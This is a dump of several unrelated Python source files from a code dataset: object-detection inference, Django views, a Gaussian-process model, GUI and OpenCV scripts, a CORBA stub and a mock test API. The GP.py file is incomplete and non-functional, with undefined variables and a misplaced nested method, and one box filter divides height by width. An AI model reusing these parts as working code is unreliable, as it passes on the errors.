np.delete(adjusted_scores, delete_list, 0)\n adjusted_classes = np.delete(adjusted_classes, delete_list, 0)\n \n # Adding the modified arrays back into the output_dict\n print(\"Original array length: \")\n print(output_dict_boxes_removed['detection_boxes'].shape[0])\n\n output_dict_boxes_removed['detection_boxes'] = adjusted_boxes\n output_dict_boxes_removed['detection_scores'] = adjusted_scores\n output_dict_boxes_removed['detection_classes'] = adjusted_classes\n output_dict_boxes_removed['num_detections'] = adjusted_boxes.shape[0]\n\n print(\"Modified array length: \")\n print(output_dict_boxes_removed['detection_boxes'].shape[0])\n\n return(output_dict_boxes_removed)\n\n\n# This function fixes the relative coordinates when splitting an image into\n# multiple subimages\ndef fix_relative_coord(output_dict, list_of_splits, image_position):\n output_dict_adj = output_dict\n\n # Getting the image width out of the list of splits (it's the right side of\n # the last split).\n image_width = list_of_splits[-1][1]\n\n # Getting the split width\n split_width = list_of_splits[image_position][1] - list_of_splits[image_position][0]\n\n # First we get a constant adjustment for the \"image position\". The\n # adjustment is where the left side of the current image starts, relative\n # to the entire image. We can get this from the list_of_splits.\n position_adjustment = list_of_splits[image_position][0] / image_width\n\n # Now we adjust the x coordinates of the 'detection_boxes' ndarray, We\n # don't need to adjust the y coordinates because we only split on the x. 
If\n    # later I add splitting on y, then the y coordinates need to be adjusted.\n    # This adjustment \"shrinks\" the relative coordinates down.\n    adjusted_boxes = output_dict['detection_boxes']\n    adjusted_boxes[:,[1,3]] *= (split_width / image_width)\n\n    # Adding the adjustment for which split image it is (the first image\n    # doesn't need adjustment, hence the if statement).\n    if image_position > 0:\n        adjusted_boxes[:,[1,3]] += position_adjustment\n    \n\n    # Now adding back in the adjusted boxes to the original ndarray\n    output_dict_adj['detection_boxes'] = adjusted_boxes\n\n    return(output_dict_adj)\n\n\n# Non-max suppression function\ndef do_non_max_suppression(input_dictionary):\n    # The actual nms comes from Tensorflow\n    nms_vec = tf.image.non_max_suppression(\n        input_dictionary['detection_boxes'],\n        input_dictionary['detection_scores'],\n        100000,\n        iou_threshold=0.5,\n        score_threshold=float('-inf'),\n        name=None)\n\n    # Converting into an ndarray\n    nms_vec_ndarray = tf.Session().run(nms_vec)\n\n    print(\"\\n\\n\\nthe nms tensor is:\")\n    print(nms_vec)\n    print(\"the nms ndarray is:\")\n    print(nms_vec_ndarray)\n    print(len(nms_vec_ndarray))\n    print(\"the length of the input array is:\")\n    print(len(input_dictionary['detection_boxes']))\n    print(\"\\n\\n\\n\")\n\n    # Indexing the input dictionary with the output of non_max_suppression,\n    # which is the list of boxes (and score, class) to keep.\n    out_dic = input_dictionary.copy()\n    out_dic['detection_boxes'] = input_dictionary['detection_boxes'][nms_vec_ndarray].copy() \n    out_dic['detection_scores'] = input_dictionary['detection_scores'][nms_vec_ndarray].copy() \n    out_dic['detection_classes'] = input_dictionary['detection_classes'][nms_vec_ndarray].copy() \n\n    # Return the filtered dictionary\n    return(out_dic)\n\n# Function for deleting boxes that are unrealistically large.\ndef delete_giant_boxes(input_dictionary, list_of_splits):\n    image_width = list_of_splits[-1][1]\n    x_box_max = 300\n    rel_x_box_max = x_box_max / image_width\n    y_box_max = 400\n    rel_y_box_max = y_box_max / image_width  # NOTE: normalised by width; the image height is not in scope here\n    coord_list = input_dictionary['detection_boxes']\n    coord_counter = 0\n    delete_list = []\n\n    for coord in coord_list:\n        xmin = coord[1]\n        xmax = coord[3]\n        x = xmax - xmin\n\n        ymin = coord[0]\n        ymax = coord[2]\n        y = ymax - ymin\n\n        if (x > rel_x_box_max) or (y > rel_y_box_max):\n            delete_list.append(coord_counter)\n            \n\n        coord_counter += 1\n\n    # Deleting the boxes that are too big\n    print(\"Number of unreasonably large boxes deleted:\")\n    print(len(delete_list))\n    print(\"\\n\")\n    out_dic = input_dictionary.copy()\n\n    if len(delete_list) > 0:\n        print(\"deleting boxes in original dict\")\n        out_dic['detection_boxes'] = np.delete(input_dictionary['detection_boxes'], delete_list, 0) \n        out_dic['detection_classes'] = np.delete(input_dictionary['detection_classes'], delete_list, 0) \n        out_dic['detection_scores'] = np.delete(input_dictionary['detection_scores'], delete_list, 0) \n\n    return(out_dic)\n\n# Setting some stuff up for the totals\nimage_names = list()\nfluorescent_totals = list()\nnonfluorescent_totals = list()\n\n# Setting up a list for the detailed output\ndetailed_results = [[\"x_min\"], [\"x_max\"], \n                    [\"y_min\"], [\"y_max\"], \n                    [\"score\"], [\"class\"], [\"name\"]]\n\n# Main basically\nfor image_path in TEST_IMAGE_PATHS:\n    # Sets the image position counter for the relative coordinate fix\n    image_position_counter = 0\n\n    image = Image.open(image_path)\n    image_name_string = str(os.path.splitext(os.path.basename(image_path))[0])\n    print('\\nprocessing ' + 
image_name_string + '\\n')\n    # the array based representation of the image will be used later in order to prepare the\n    # result image with boxes and labels on it.\n    image_np = load_image_into_numpy_array(image)\n\n    # Here we set up the image splits, based on the user's desired number of\n    # sub-images, including the overlap. The splits will be a list of sets of\n    # two numbers, the lower and upper bounds of the splits.\n    splits = get_splits(image_np.shape[1], args.image_split_num, args.overlap_width)\n    print(splits)\n    \n    # Here's where the actual splitting happens\n    #split_image_np = np.array_split(image_np, args.image_split_num, axis=1)\n    split_image_np = split_image(image_np, splits)\n    print(\"\\nThe split image array list looks like:\")\n    for array in split_image_np:\n        print(array.shape)\n    \n    # Running the inference for the first split, or in the case of a split number\n    # of 1, the only split.\n    output_dict = run_inference_for_single_image(split_image_np[0], detection_graph)\n    \n    if args.image_split_num > 1:\n        # Getting rid of edge boxes for the first split image\n        output_dict = remove_edge_boxes(\n            output_dict, \n            splits,\n            image_position_counter)\n\n        # Fixing the relative coordinates for the first split image\n        output_dict = fix_relative_coord(\n            output_dict, \n            splits, \n            image_position_counter)\n\n    image_position_counter = image_position_counter + 1\n\n    # Inference for the following splits, if there's more than 1.\n    if args.image_split_num > 1:\n\n        # Goes through the image sub-arrays, skipping the first one since we\n        # already did that one and the new data will be appended to it.\n        for image_split in split_image_np[1:]:\n            print(\"\\nProcessing split image. Image position counter:\")\n            print(str(image_position_counter) + '\\n')\n\n            # Running the inference\n            split_output_dict = run_inference_for_single_image(image_split, detection_graph)\n            \n            # Getting rid of edge boxes\n            split_output_dict = remove_edge_boxes(\n                split_output_dict, \n                splits,\n                image_position_counter)\n            \n            # Correcting the relative coordinates\n            split_output_dict = fix_relative_coord(\n                split_output_dict, \n                splits, \n                image_position_counter)\n\n            # Adding the new data to the output dict\n            output_dict['detection_boxes'] = np.concatenate((\n                output_dict['detection_boxes'], \n                split_output_dict['detection_boxes']))\n            output_dict['detection_classes'] = np.concatenate((\n                output_dict['detection_classes'], \n                split_output_dict['detection_classes']))\n            output_dict['detection_scores'] = np.concatenate((\n                output_dict['detection_scores'], \n                split_output_dict['detection_scores']))\n\n            #print(output_dict['detection_boxes'])\n            #print(output_dict['detection_classes'])\n            #print(output_dict['detection_scores'])\n\n            image_position_counter = image_position_counter + 1\n\n    # I'll delete any giant boxes here\n    output_dict = delete_giant_boxes(output_dict, splits)\n\n    # Now that I have the output from the sub-images all combined together, I'll\n    # do another round of non-maximum suppression to remove the redundant boxes\n    # on the edges. This should also fix the problem where the model predicts\n    # fluorescent and nonfluorescent for the same seed. 
It should keep the one\n    # with the higher detection score.\n    output_dict = do_non_max_suppression(output_dict)\n\n    # Adding in a bit here to count the total number of detections\n    seed_counts = get_object_counts(output_dict, args.min_score_threshold)\n\n    # Adding the numbers to the output lists\n    image_names.append(image_name_string)\n    fluorescent_totals.append(seed_counts[0])\n    nonfluorescent_totals.append(seed_counts[1])\n\n    # Getting detailed info about the boxes and scores for output (replace this\n    # with ndarrays)\n    image_detailed_results = get_boxes_and_scores(output_dict, image_name_string)\n    detailed_results[0].extend(image_detailed_results[0])\n    detailed_results[1].extend(image_detailed_results[1])\n    detailed_results[2].extend(image_detailed_results[2])\n    detailed_results[3].extend(image_detailed_results[3])\n    detailed_results[4].extend(image_detailed_results[4])\n    detailed_results[5].extend(image_detailed_results[5])\n    detailed_results[6].extend(image_detailed_results[6])\n\n    # Visualization of the results of a detection.\n    vis_util.visualize_boxes_and_labels_on_image_array(\n        image_np,\n        output_dict['detection_boxes'],\n        output_dict['detection_classes'],\n        output_dict['detection_scores'],\n        category_index,\n        use_normalized_coordinates=True,\n        line_thickness=2,\n        max_boxes_to_draw=10000,\n        min_score_thresh=args.min_score_threshold)\n    plt.figure(figsize=IMAGE_SIZE)\n    plt.imsave(args.output_path + '/' + image_name_string + \"_plot\" + \".jpg\", image_np)\n\n# Printing the summary lists to a file\nwith open(args.output_path + '/' + 'output.tsv', 'w') as output_file:\n    writer = csv.writer(output_file, delimiter='\\t')\n    writer.writerows(zip(image_names, fluorescent_totals, nonfluorescent_totals))\n\n# Printing the detailed lists to a file\nwith open(args.output_path + '/' + 'detailed_output.tsv', 'w') as output_file:\n    writer = csv.writer(output_file, delimiter='\\t')\n    writer.writerows(zip(detailed_results[0],\n                         detailed_results[1],\n                         detailed_results[2],\n                         detailed_results[3],\n                         detailed_results[4],\n                         detailed_results[5],\n                         detailed_results[6]))\n\n","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":28738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"218881687","text":"from django.shortcuts import render\nfrom account.models import User\nfrom course.models import Course,UserCourse,Category,Review\nfrom django.db.models import Avg\n\n# Get programming language categories\ndef get_language():\n    model_category = Category.objects.all()\n    return model_category\n\ndef index(request):\n    all_course = Course.objects.all().order_by('-created_at')\n    for c in all_course:\n        course = Course.objects.get(course_id=c.course_id)\n        course_rating = Review.objects.filter(course=course).aggregate(Avg('rating'))\n        if course_rating['rating__avg'] is not None:\n            rating = int(course_rating['rating__avg'])\n            c.rating = range(rating) \n        else:\n            c.rating = None\n    category = get_language()\n    return render(request, 'index.html',locals())\n\ndef teacher(request):\n    category = get_language()\n    teacher = User.objects.get(email=request.user.email)\n    mycourse = Course.objects.filter(teacher=teacher).order_by('-created_at')\n    sort = 'newest'\n\n    teacher_course_count = Course.objects.filter(teacher=teacher).count()\n    teacher_student_count = UserCourse.objects.filter(course__teacher=teacher).count()\n    teacher_rating = Review.objects.filter(course__teacher=teacher).aggregate(Avg('rating'))\n    \n    if(teacher_rating['rating__avg'] 
is None or teacher_rating == 'None'):\n        teacher_rating = ''\n    else:\n        teacher_rating = format(teacher_rating['rating__avg'], '.1f')\n\n    \n\n    try:\n        sort = request.GET.get('sort', 'newest')\n        if sort == 'newest':\n            mycourse = Course.objects.filter(teacher=teacher).order_by('-created_at')\n        else:\n            mycourse = Course.objects.filter(teacher=teacher).order_by('created_at') \n    except Exception as e:\n        mycourse = Course.objects.filter(teacher=teacher).order_by('-created_at')\n\n    return render(request,'teacher_index.html',locals())\n\n","sub_path":"index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"355415513","text":"import torch\nimport gpytorch\nimport numpy as np\nfrom itertools import combinations\n\nclass ExactGPModel(gpytorch.models.ExactGP):\n    def __init__(self, nVars, order, inputs, likelihood):\n        self.nVars = nVars\n        self.order = order\n\n        self.xTrain = inputs['x_vals']\n        self.yTrain = inputs['y_vals'] - np.mean(inputs['y_vals'])\n\n        super(ExactGPModel, self).__init__(self.xTrain, self.yTrain, likelihood)\n        self.mean_module = gpytorch.means.ConstantMean()\n        self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel())\n\n    # ---------------------------------------------------------\n\n\n\ndef GPTrain(inputs):\n\n\n    def train(self, inputs):\n        # set data\n        self.xTrain = inputs['x_vals']\n        self.yTrain = inputs['y_vals']\n\n        # create matrix with all covariates based on order\n        self.xTrain = self.order_effects(self.xTrain, self.order)\n        (nSamps, nCoeffs) = self.xTrain.shape\n\n        # NOTE: the sampling step that would produce a0, alphaGibbs and\n        # idx_nnzero is missing here; this function is incomplete as written.\n\n        # append zeros back - note alpha(1,:) is linear intercept\n        alpha_pad = np.zeros(nCoeffs)\n        alpha_pad[idx_nnzero] = alphaGibbs[:,-1]\n        self.alpha = np.append(a0, alpha_pad)\n\n\n    # ---------------------------------------------------------\n    # ---------------------------------------------------------\n\n    def order_effects(self, x_vals, ord_t):\n        # order_effects: Function computes data matrix for all coupling\n        # orders to be added into linear regression model.\n\n        # Find number of variables\n        n_samp, n_vars = x_vals.shape\n\n        # Generate matrix to store results\n        x_allpairs = x_vals\n\n        for ord_i in range(2,ord_t+1):\n\n            # generate all combinations of indices (without diagonals)\n            offdProd = np.array(list(combinations(np.arange(n_vars),ord_i)))\n\n            # generate products of input variables\n            x_comb = np.zeros((n_samp, offdProd.shape[0], ord_i))\n            for j in range(ord_i):\n                x_comb[:,:,j] = x_vals[:,offdProd[:,j]]\n            x_allpairs = np.append(x_allpairs, np.prod(x_comb,axis=2),axis=1)\n\n        return x_allpairs\n\n\n# -- END OF FILE --","sub_path":"src/GP.py","file_name":"GP.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"44660407","text":"from features.ExtractFeatures import extract_features\nfrom tkinter.filedialog import askopenfilename\n\nfrom features.GroupSigns import get_files\nimport tkinter as tk\nfrom tkinter import filedialog\n\n\nclass SelectionWindow:\n    out_path = None\n\n    def __init__(self, in_path):\n        self.in_path = in_path\n        root = tk.Tk()\n\n        self.in_path_string = tk.StringVar(value=in_path)\n        self.out_path_string = tk.StringVar()\n        self.recursively = tk.BooleanVar(root, value=False)\n        tk.Button(root, text=\"Source Directory\", command=self.get_source_dir).pack(side=tk.TOP)\n        tk.Label(None, textvariable=self.in_path_string, fg='black').pack()\n        tk.Button(root, 
text=\"Destination Directory\", command=self.get_destination_dir).pack(side=tk.TOP)\n tk.Label(None, textvariable=self.out_path_string, fg='black').pack()\n\n tk.Checkbutton(root, text=\"Recursively\", variable=self.recursively).pack()\n\n tk.Button(root, text=\"Start\", command=self.get_files).pack(side=tk.TOP)\n root.mainloop()\n\n def get_source_dir(self):\n self.in_path = filedialog.askdirectory(initialdir=self.in_path)\n self.in_path_string.set(self.in_path)\n\n def get_destination_dir(self):\n self.out_path = filedialog.askdirectory(initialdir=self.out_path)\n self.out_path_string.set(self.out_path)\n\n def get_files(self):\n if self.in_path is not None and self.out_path is not None:\n get_files(\n file_name='all',\n in_dir_path=self.in_path,\n out_dir_path=self.out_path,\n recursively=self.recursively.get()\n )\n\n\nif __name__ == '__main__':\n dir_path = '/media/bartek/120887D50887B5EF/POLITECHNIKA/Magisterka/SUSigP/Data/BlindSubCorpus/FORGERY'\n\n SelectionWindow(dir_path)\n\n # extract_features(\n # in_dir_path='/media/bartek/120887D50887B5EF/POLITECHNIKA/Magisterka/SUSigP/Data/BlindSubCorpus',\n # out_dir_path='/media/bartek/120887D50887B5EF/POLITECHNIKA/Magisterka/SUSigP/results',\n # signatory_nr='039',\n # files_urls=['/FORGERY/039_f_9.sig']\n # )\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"129061325","text":"# Exercise 6 - String Lists\r\n# Date: 18/5/20\r\n# Ask the user for a string and print out if this string is a palindrome or not\r\n# A palindrome is a string that reads the same forward and backward\r\n\r\nstring = input('Type a string:')\r\n\r\nif string[:] == string[::-1]:\r\n print('This is a palindrome.')\r\nelse:\r\n print('This is not a palindrome in which the reverse string is %s.' 
% string[::-1])\r\n","sub_path":"Ex6.py","file_name":"Ex6.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"169085097","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: ./TimeBase_idl.py\n# Compiled at: 2018-07-20 10:03:27\n# Size of source mod 2**32: 4147 bytes\nimport omniORB, _omnipy\nfrom omniORB import CORBA, PortableServer\n_0_CORBA = CORBA\n_omnipy.checkVersion(4, 2, __file__, 1)\ntry:\n property\nexcept NameError:\n\n def property(*args):\n pass\n\n\n__name__ = 'TimeBase'\n_0_TimeBase = omniORB.openModule('TimeBase', '/tmp/corba/omni/share/idl/omniORB/COS/TimeBase.idl')\n_0_TimeBase__POA = omniORB.openModule('TimeBase__POA', '/tmp/corba/omni/share/idl/omniORB/COS/TimeBase.idl')\n\nclass TimeT:\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/TimeT:1.0'\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n\n_0_TimeBase.TimeT = TimeT\n_0_TimeBase._d_TimeT = omniORB.tcInternal.tv_ulonglong\n_0_TimeBase._ad_TimeT = (omniORB.tcInternal.tv_alias, TimeT._NP_RepositoryId, 'TimeT', omniORB.tcInternal.tv_ulonglong)\n_0_TimeBase._tc_TimeT = omniORB.tcInternal.createTypeCode(_0_TimeBase._ad_TimeT)\nomniORB.registerType(TimeT._NP_RepositoryId, _0_TimeBase._ad_TimeT, _0_TimeBase._tc_TimeT)\ndel TimeT\n\nclass InaccuracyT:\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/InaccuracyT:1.0'\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n\n_0_TimeBase.InaccuracyT = InaccuracyT\n_0_TimeBase._d_InaccuracyT = omniORB.typeMapping['IDL:omg.org/TimeBase/TimeT:1.0']\n_0_TimeBase._ad_InaccuracyT = (omniORB.tcInternal.tv_alias, InaccuracyT._NP_RepositoryId, 'InaccuracyT', omniORB.typeCodeMapping['IDL:omg.org/TimeBase/TimeT:1.0']._d)\n_0_TimeBase._tc_InaccuracyT = omniORB.tcInternal.createTypeCode(_0_TimeBase._ad_InaccuracyT)\nomniORB.registerType(InaccuracyT._NP_RepositoryId, _0_TimeBase._ad_InaccuracyT, _0_TimeBase._tc_InaccuracyT)\ndel InaccuracyT\n\nclass TdfT:\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/TdfT:1.0'\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n\n_0_TimeBase.TdfT = TdfT\n_0_TimeBase._d_TdfT = omniORB.tcInternal.tv_short\n_0_TimeBase._ad_TdfT = (omniORB.tcInternal.tv_alias, TdfT._NP_RepositoryId, 'TdfT', omniORB.tcInternal.tv_short)\n_0_TimeBase._tc_TdfT = omniORB.tcInternal.createTypeCode(_0_TimeBase._ad_TdfT)\nomniORB.registerType(TdfT._NP_RepositoryId, _0_TimeBase._ad_TdfT, _0_TimeBase._tc_TdfT)\ndel TdfT\n_0_TimeBase.UtcT = omniORB.newEmptyClass()\n\nclass UtcT(omniORB.StructBase):\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/UtcT:1.0'\n\n def __init__(self, time, inacclo, inacchi, tdf):\n self.time = time\n self.inacclo = inacclo\n self.inacchi = inacchi\n self.tdf = tdf\n\n\n_0_TimeBase.UtcT = UtcT\n_0_TimeBase._d_UtcT = (omniORB.tcInternal.tv_struct, UtcT, UtcT._NP_RepositoryId, 'UtcT', 'time', omniORB.typeMapping['IDL:omg.org/TimeBase/TimeT:1.0'], 'inacclo', omniORB.tcInternal.tv_ulong, 'inacchi', omniORB.tcInternal.tv_ushort, 'tdf', omniORB.typeMapping['IDL:omg.org/TimeBase/TdfT:1.0'])\n_0_TimeBase._tc_UtcT = omniORB.tcInternal.createTypeCode(_0_TimeBase._d_UtcT)\nomniORB.registerType(UtcT._NP_RepositoryId, _0_TimeBase._d_UtcT, _0_TimeBase._tc_UtcT)\ndel UtcT\n_0_TimeBase.IntervalT = 
omniORB.newEmptyClass()\n\nclass IntervalT(omniORB.StructBase):\n    _NP_RepositoryId = 'IDL:omg.org/TimeBase/IntervalT:1.0'\n\n    def __init__(self, lower_bound, upper_bound):\n        self.lower_bound = lower_bound\n        self.upper_bound = upper_bound\n\n\n_0_TimeBase.IntervalT = IntervalT\n_0_TimeBase._d_IntervalT = (omniORB.tcInternal.tv_struct, IntervalT, IntervalT._NP_RepositoryId, 'IntervalT', 'lower_bound', omniORB.typeMapping['IDL:omg.org/TimeBase/TimeT:1.0'], 'upper_bound', omniORB.typeMapping['IDL:omg.org/TimeBase/TimeT:1.0'])\n_0_TimeBase._tc_IntervalT = omniORB.tcInternal.createTypeCode(_0_TimeBase._d_IntervalT)\nomniORB.registerType(IntervalT._NP_RepositoryId, _0_TimeBase._d_IntervalT, _0_TimeBase._tc_IntervalT)\ndel IntervalT\n__name__ = 'TimeBase_idl'\n_exported_modules = ('TimeBase', )","sub_path":"pycfiles/ans_python-0.3.1-py3-none-any/TimeBase_idl.cpython-36.py","file_name":"TimeBase_idl.cpython-36.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"102871275","text":"import os\nimport yaml\nimport shelve\n\nclass ReachabilityTestAPI:\n    \"\"\"Simple reachability test API\"\"\"\n    d = []\n    dbname = \"reachabilitydb\"\n    c = []\n    runlistdb = \"runlistdb\"\n    run_list = []\n    quick_test = \"temporaryvariabletoholdquicktest\"\n\n    def __init__(self):\n        self.d = []\n        self.dbname = \"reachabilitydb\"\n        self.runlistdb = \"runlistdb\"\n        self.c = []\n        self.run_list = []\n        self.quick_test = \"temporaryvariabletoholdquicktest\"\n\n    \"\"\"Adds a reachability object to the running\n    list of tests.\n    argument: ReachabilityTestStub object\"\"\"\n    def addReachabilityTest(self,test):\n        d = shelve.open(self.dbname)\n        d[test.name] = test\n        d.close()\n\n        c = shelve.open(self.runlistdb)\n        c[test.name] = []\n        c.close()\n\n    \"\"\"Adds a quick test a.k.a. troubleshoot to a\n    temporary location in memory.\n    argument: ReachabilityTestStub object\"\"\"\n    def addQuickTest(self,test):\n        d = shelve.open(self.dbname)\n        d[self.quick_test] = test\n        d.close()\n\n        c = shelve.open(self.runlistdb)\n        c[self.quick_test] = []\n        c.close()\n\n    \"\"\"Gets a sorted list of reachability test objects.\n    The function clears any previously run quick test\n    before returning the list.\n    argument: none\n    return: list\"\"\"\n    def listReachabilityTest(self):\n        d = shelve.open(self.dbname)\n        if(d.has_key(self.quick_test)):\n            del d[self.quick_test]\n        testlist = d.keys()\n        testlist.sort()\n        returnlist = []\n        for item in testlist:\n            returnlist.append(d[item])\n        d.close()\n\n        c = shelve.open(self.runlistdb)\n        if(c.has_key(self.quick_test)):\n            del c[self.quick_test]\n        c.close()\n\n        return returnlist\n\n    \"\"\"Gets a list of the previous reachability test runs\n    for a particular test. It takes the name of the\n    test as key to find the object in the shelve object.\n    It returns a list of the previous run\n    timestamps for that test.\n    argument: String\n    return: list\"\"\"\n    def listTestRuns(self,test_name):\n        c = shelve.open(self.runlistdb)\n        if(c.has_key(test_name)):\n            self.run_list = c[test_name]\n        c.close()\n\n        run_list = []\n        count = 0\n\n        for item in self.run_list:\n            run_list.append(self.run_list[count].last_run)\n            count += 1\n\n        if(run_list.__len__() < 1):\n            return None\n\n        return run_list\n\n    \"\"\"Stores a previously created quick test as a\n    reachability test. It takes the test name as\n    argument to use as key to store into the\n    shelve object. 
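The run history recorded while it was a quick\n    test is carried over under the new name as well. 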
It returns the newly added test.\n    argument: String\n    return: ReachabilityTestStub object\"\"\"\n    def saveQuickTest(self,test_name):\n        d = shelve.open(self.dbname)\n        saved_test = d[self.quick_test]\n        saved_test.name = test_name\n        d[test_name] = saved_test\n        d.close()\n\n        c = shelve.open(self.runlistdb)\n        saved_run_list = c[self.quick_test]\n        c[test_name] = saved_run_list\n        c.close()\n\n        return saved_test\n    \n    \"\"\"Delete a reachability test stored in the\n    shelve object. It takes the test name as argument.\n    argument: String\"\"\"\n    def deleteReachabilityTest(self,test):\n        d = shelve.open(self.dbname)\n        if(d.has_key(test)):\n            del d[test]\n        d.close()\n\n        c = shelve.open(self.runlistdb)\n        if(c.has_key(test)):\n            del c[test]\n        c.close()\n\n    \"\"\"Delete the quick test from the shelve object. It\n    takes no argument since only one quick test is \n    permitted at a time so no need to find it.\"\"\"\n    def deleteQuickTest(self):\n        d = shelve.open(self.dbname)\n        del d[self.quick_test]\n        d.close()\n\n        c = shelve.open(self.runlistdb)\n        if(c.has_key(self.quick_test)):\n            del c[self.quick_test]\n        c.close()\n\n    \"\"\"Simulates the running of the quick test. It updates\n    the quick test object with a random pass/fail.\"\"\"\n    def runQuickTest(self):\n        c = shelve.open(self.runlistdb)\n        self.run_list = c[self.quick_test]\n        c.close()\n\n        d = shelve.open(self.dbname)\n        data = d[self.quick_test]\n        data.runTest()\n        data.runTest()\n        if(data.status == \"pass\" or data.status == \"fail\"):\n            self.run_list.append(data)\n            if(self.run_list.__len__() > 5):\n                self.run_list.pop(0)\n        d[self.quick_test] = data\n        d.close()\n\n        c = shelve.open(self.runlistdb)\n        c[self.quick_test] = self.run_list\n        c.close()\n    \n    \"\"\"Simulates the running of the reachability test. The \n    function updates the object with a pending state if run\n    for the first time and a random pass/fail if run again.\n    It takes the test name as argument to find the object \n    in the shelve.\n    argument: String\"\"\"\n    def runReachabilityTest(self,test):\n        c = shelve.open(self.runlistdb)\n        self.run_list = c[test]\n        c.close()\n\n        d = shelve.open(self.dbname)\n        data = d[test]\n        data.runTest()\n        if(data.status == \"pass\" or data.status == \"fail\"):\n            self.run_list.append(data)\n            if(self.run_list.__len__() > 5):\n                self.run_list.pop(0)\n        d[test] = data\n        d.close()\n\n        c = shelve.open(self.runlistdb)\n        c[test] = self.run_list\n        c.close()\n\n    \"\"\"Returns the reachability test stored in the \n    shelve. It takes the test name as argument.\n    argument: String\n    return: ReachabilityTestStub object\"\"\"\n    def getReachabilityTest(self,test):\n        d = shelve.open(self.dbname)\n        data = d[test]\n        d.close()\n        return data\n    \n    \"\"\"Returns the quick test stored in the shelve.\n    return: ReachabilityTestStub object\"\"\"\n    def getQuickTest(self):\n        d = shelve.open(self.dbname)\n        data = d[self.quick_test]\n        d.close()\n        return data\n    \n    \"\"\"Updates a current reachability test stored in\n    the shelve. 
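The entry is removed under its old key,\n    re-stored under the new object's name, and its\n    run history is reset to an empty list. 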
It takes the test name and the \n new reachability test object to replace the\n old one with.\n arguments: String, ReachabilityTestStub object\"\"\"\n def updateReachabilityTest(self, test_id, data):\n d = shelve.open(self.dbname)\n del d[test_id]\n d[data.name] = data\n d.close()\n\n c = shelve.open(self.runlistdb)\n del c[test_id]\n c[data.name] = []\n c.close()\n\n\n\nclass NetworkTemplateAPI:\n \"\"\"Simple Network Template API\"\"\"\n heatdb = \"heatdb\"\n heat_template = \"temporaryvariabletoholdexampleheattemplate\"\n h = []\n heat_template_file_path = \"\"\n\n def __init__(self):\n self.heatdb = \"heatdb\"\n self.h = []\n self.heat_template = \"temporaryvariabletoholdexampleheattemplate\"\n self.heat_template_file_path = os.path.abspath(\n os.path.join(os.path.dirname(__file__),\n \"sample_heat_templates\",\n \"basic_3tier.yaml\")\n )\n\n \"\"\"Reads the sample heat template file and uses the PyYAML\n parser to store the data in a dictionary within the\n shelve.\"\"\"\n def loadHeatTemplate(self):\n f = open(self.heat_template_file_path)\n dataMap = yaml.safe_load(f)\n f.close()\n\n h = shelve.open(self.heatdb)\n h[self.heat_template] = dataMap\n h.close()\n\n \"\"\"Returns the heat template object stored in the\n shelve if it exist. Otherwise it returns an empty\n dictionary.\n return: dictionary\"\"\"\n def getHeatTemplate(self):\n h = shelve.open(self.heatdb)\n if(h.has_key(self.heat_template)):\n template = h[self.heat_template]\n else:\n template = {}\n h.close()\n return template\n\n \"\"\"Deletes the heat template object if it exist in\n the shelve. Otherwise, it does nothing.\"\"\"\n def removeHeatTemplate(self):\n h = shelve.open(self.heatdb)\n if(h.has_key(self.heat_template)):\n del h[self.heat_template]\n h.close()\n \n \"\"\"Updates the heat template with a new dictionary\n pass on as a parameter.\n argument: dictionary\"\"\"\n def updateHeatTemplate(self,updated_template):\n h = shelve.open(self.heatdb)\n h[self.heat_template] = updated_template\n h.close()\n","sub_path":"openstack_dashboard/dashboards/project/connections/mockapi.py","file_name":"mockapi.py","file_ext":"py","file_size_in_byte":8655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11498828","text":"import cv2\nimport numpy as np\n\ncapture = cv2.VideoCapture(0)\nfgbg = cv2.bgsegm.createBackgroundSubtractorMOG()\nflag = 1\nwhile(True):\n ret, frame = capture.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n fgmask = fgbg.apply(frame)\n cv2.imshow('frame', fgmask)\n cv2.imshow('ai', frame)\n cv2.imshow('dist', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\nprint(type(frame))\nprint(type(fgbg))\ncapture.release()\ncv2.destroyAllWindows()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455264570","text":"from django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\nfrom encyclopedia.tamilthedal.models import *\nimport os, string\nimport sys\nimport re\nfrom whoosh.index import open_dir\nfrom whoosh.qparser import QueryParser, MultifieldParser\nfrom whoosh.fields import Schema, STORED, ID, KEYWORD, 
